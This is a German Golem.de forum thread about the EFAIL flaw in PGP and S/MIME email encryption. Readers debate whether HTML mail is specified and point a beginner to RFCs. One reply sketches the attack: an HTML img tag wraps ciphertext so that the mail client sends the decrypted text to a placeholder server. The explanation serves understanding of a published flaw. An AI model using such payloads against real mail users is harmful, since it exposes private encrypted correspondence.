1. Foren
  2. Kommentare
  3. Security
  4. Alle Kommentare zum Artikel
  5. › PGP/SMIME: Angreifer können sich…

Fragen zum Ablauf und Informationsgewinn für das Selbststudium

  1. Thema

Neues Thema Ansicht wechseln


  1. Fragen zum Ablauf und Informationsgewinn für das Selbststudium

    Autor: an0815 14.05.18 - 18:37

    Kann mir Anfänger jemand erklären, wo ich die Informationen etc., z.B. wie sich die Kommunikation des Clients etc. verhält ( iframe etc.) ? Stehen diese in einen RFC etc. .
    Oder das Verhalten von HTML-Mails etc. ?
    Da ich überhaupt keine Ahnung habe und wohl auch unfähig bin zu googlen würde ich mich über hilfreiche Antworten freuen.

    Danke im voraus.

    Da ich nicht soviel Ahnung, habe ist meine Frage wohl nicht ganz verständlich, aber ich hoffe es ist für jemanden möglich diese zu verstehen.

  2. Re: Fragen zum Ablauf und Informationsgewinn für das Selbststudium

    Autor: WilliWerWolf 14.05.18 - 19:32

    an0815 schrieb:
    --------------------------------------------------------------------------------
    > Kann mir Anfänger jemand erklären, wo ich die Informationen etc., z.B. wie
    > sich die Kommunikation des Clients etc. verhält ( iframe etc.) ? Stehen
    > diese in einen RFC etc. .

    Richtig! Gib in die Suchmaschine Deines Vertrauens einfach mal "email RFC" ein!. Duckduckgo nennt auf der ersten Seite schon 822, 2821 und 2822.

    > Oder das Verhalten von HTML-Mails etc. ?

    HTML-Mail ist nicht genormt.

  3. Re: Fragen zum Ablauf und Informationsgewinn für das Selbststudium

    Autor: hab (Golem.de) 14.05.18 - 19:35

    an0815 schrieb:
    --------------------------------------------------------------------------------
    > Oder das Verhalten von HTML-Mails etc. ?

    Tatsächlich habe ich mir diese Frage auch gestellt. Ich denke es ist die richtige Frage. Und die Antwort ist wohl auch tatsächlich: HTML-Mails sind nirgendwo spezifiziert und jeder Mailclient macht was er für richtig hält.

    So sehr ich denke die Lücke zeigt einen Bug in der Spezifikation von S/MIME und PGP: Sie zeigt hier mit Sicherheit auch eine Lücke - und mangelhafte Klarheit - bei der Verarbeitung von HTML-Mails.

  4. Re: Fragen zum Ablauf und Informationsgewinn für das Selbststudium

    Autor: Spaghetticode 14.05.18 - 20:13

    Wie auf https://www.efail.de/ anschaulich beschrieben, wird ein HTML-Dokument um den verschlüsselten Text gebaut.

    Beispiel:
    <img src="https://www.example.com/12345/
    [verschlüsselter Text]
    ">

    Der E-Mail-Client entschlüsselt den Text:
    <img src="https://www.example.com/12345/
    [entschlüsselter Text]
    ">

    Anschließend rendert er die E-Mail und versucht, ein Bild von https://www.example.com/12345/[entschlüsselter Text] zu laden. Der Webserver speichert die ID 12345 (zugeordnet zur konkreten E-Mail) und den mitgelieferten Text und liefert ein Alibi-Bild aus.

    Den Angriff kann auch mit einem Hyperlink oder einem Formularelement durchgeführt werden.

    Ein anderer Angriffsvektor ist, den HTML-Code in den verschlüsselten Text zu „schmuggeln“, was möglich wird, wenn der Angreifer Teile vom Klartext kennt.

  5. Re: Fragen zum Ablauf und Informationsgewinn für das Selbststudium

    Autor: freebyte 15.05.18 - 01:25

    hannob (golem.de) schrieb:
    --------------------------------------------------------------------------------
    > Tatsächlich habe ich mir diese Frage auch gestellt. Ich denke es ist die
    > richtige Frage. Und die Antwort ist wohl auch tatsächlich: HTML-Mails sind
    > nirgendwo spezifiziert und jeder Mailclient macht was er für richtig hält.

    Mit Verlaub, aber es ist Wunschdenken dass das Problem an unzureichenden Specs liegt.

    Wenn in der E-Mail steht "Content-Type: text/html" ist der Kram als HTML zu rendern und darzustellen - da gibt es keine Definitionsprobleme.

    > So sehr ich denke die Lücke zeigt einen Bug in der Spezifikation von S/MIME
    > und PGP: Sie zeigt hier mit Sicherheit auch eine Lücke - und mangelhafte
    > Klarheit - bei der Verarbeitung von HTML-Mails.

    Keineswegs, es ist alles in Ordnung: PGP Entschlüsselt und wirft das Ergebnis dem HTML-Renderer vor die Füße.

    Wenn die Sicherheitseinstellungen der Renderengine es erlauben, fremde Inhalte nachzuladen hat man halt eines der vielen Probleme, die HTML in E-Mails so mit sich bringt.

    *DAS* jetzt PGP als Fehler vorzuwerfen ist eher unklug.

    fb

  6. Re: Fragen zum Ablauf und Informationsgewinn für das Selbststudium

    Autor: Quantium40 15.05.18 - 04:06

    hannob (golem.de) schrieb:
    > Tatsächlich habe ich mir diese Frage auch gestellt. Ich denke es ist die
    > richtige Frage. Und die Antwort ist wohl auch tatsächlich: HTML-Mails sind
    > nirgendwo spezifiziert und jeder Mailclient macht was er für richtig hält.

    Prinzipiell ist das schon recht ordentlich spezifiziert.
    RFC 2045-2049 definieren, wie per MIME die Mail in unterschiedliche Blöcke aufgeteilt wird. Die Behandlung der Blöcke erfolgt danach gemäß ihres Content-Types.
    Im Falle von Content-type: text/html hat der entsprechende Block als Text im HTML-Format interpretiert zu werden. Wie das geht, gibt das W3C vor.

    Bei dem aktuell aufgefallenen Bug ist das eigentliche Problem, dass das Containerformat (MIME) nicht sauber vom Inhalt getrennt wird.

    Würde das getan, würden Entschlüsselungsfunktionen die Crypto-Payload im HTML-Tag entweder gar nicht zu Gesicht bekommen, weil das einem text/html-Block zugeordnet wäre oder aber sie würden den verschlüsselten Block zwar sehen und entschlüsseln aber nicht ausleiten können, weil er nicht an den HTML-Renderer gegeben wird, sondern z.B. als Anhang angezeigt würde.

  7. Re: Fragen zum Ablauf und Informationsgewinn für das Selbststudium

    Autor: Auspuffanlage 21.05.18 - 13:01

    an0815 schrieb:
    --------------------------------------------------------------------------------
    > Kann mir Anfänger jemand erklären, wo ich die Informationen etc., z.B. wie
    > sich die Kommunikation des Clients etc. verhält ( iframe etc.) ? Stehen
    > diese in einen RFC etc. .
    > Oder das Verhalten von HTML-Mails etc. ?
    > Da ich überhaupt keine Ahnung habe und wohl auch unfähig bin zu googlen
    > würde ich mich über hilfreiche Antworten freuen.
    >
    > Danke im voraus.
    >
    > Da ich nicht soviel Ahnung, habe ist meine Frage wohl nicht ganz
    > verständlich, aber ich hoffe es ist für jemanden möglich diese zu
    > verstehen.

    Hi ich interpretiere das mal so, dass du wissen willst wo es diese Informationen gibt.

    Hier kannst du nach allen rfc suchen
    https://www.ietf.org/standards/rfcs/

    Hier die Info was rfc sind
    https://www.elektronik-kompendium.de/sites/net/0904121.htm

    Für E-Mail wäre dieser Artikel auch interessant
    https://www.elektronik-kompendium.de/sites/net/0902261.htm

    Ich hoffe ich konnte dir etwas weiterhelfen und deine frage richtig beantworten :)

  1. Thema

Neues Thema Ansicht wechseln


Um zu kommentieren, loggen Sie sich bitte ein oder registrieren Sie sich. Sie müssen ausserdem in Ihrem Account-Profil unter Forum einen Nutzernamen vergeben haben. Zum Login

Stellenmarkt
  1. Kassenärztliche Vereinigung Rheinland-Pfalz, Koblenz, Mainz, Trier
  2. RAFI GmbH & Co. KG, Berg
  3. Statistisches Bundesamt, Wiesbaden
  4. Hays AG, München

Golem pur
  • Golem.de ohne Werbung nutzen

Anzeige
Hardware-Angebote
  1. (reduzierte Überstände, Restposten & Co.)


Haben wir etwas übersehen?

E-Mail an news@golem.de


Mobilfunk: UMTS-Versteigerungstaktik wird mit Nobelpreis ausgezeichnet
Mobilfunk
UMTS-Versteigerungstaktik wird mit Nobelpreis ausgezeichnet

Sie haben Deutschland zum Mobilfunk-Entwicklungsland gemacht und wurden heute mit dem Nobelpreis ausgezeichnet: die Auktionstheorien von Paul R. Milgrom und Robert B. Wilson.
Ein IMHO von Frank Wunderlich-Pfeiffer

  1. Coronakrise Deutsche Urlaubsregionen verzeichnen starke Mobilfunknutzung
  2. LTE Telekom benennt weitere Gewinner von "Wir jagen Funklöcher"
  3. Mobilfunk Rufnummernportierung darf maximal 7 Euro kosten

Oneplus 8T im Test: Oneplus gutes Gesamtpaket kostet 600 Euro
Oneplus 8T im Test
Oneplus gutes Gesamtpaket kostet 600 Euro

Das Oneplus 8 wird durch das 8T abgelöst. Im Test überzeugen vor allem die Kamera und die Ladegeschwindigkeit. Ein 8T Pro gibt es 2020 nicht.
Ein Test von Tobias Költzsch

  1. Bloatware Oneplus installiert keine Facebook-Dienste mehr vor
  2. Smartphone Oneplus 8 und 8 Pro bekommen Android 11
  3. Mobile Neues Oneplus-Smartphone für 200 US-Dollar erwartet

Shifoo: Golem.de startet Betatest seiner Karriere-Coaching-Plattform
Shifoo
Golem.de startet Betatest seiner Karriere-Coaching-Plattform

Beratung, die IT-Profis in Job & Karriere effizient und individuell unterstützt: Golem.de startet die Video-Coaching-Plattform Shifoo. Hilf uns in der Betaphase, sie für dich perfekt zu machen, und profitiere vom exklusiven Angebot!

  1. Stellenanzeige Golem.de sucht Verstärkung für die Redaktion
  2. Stellenanzeige Golem.de sucht CvD (m/w/d)
  3. In eigener Sache Die 24-kernige Golem Workstation ist da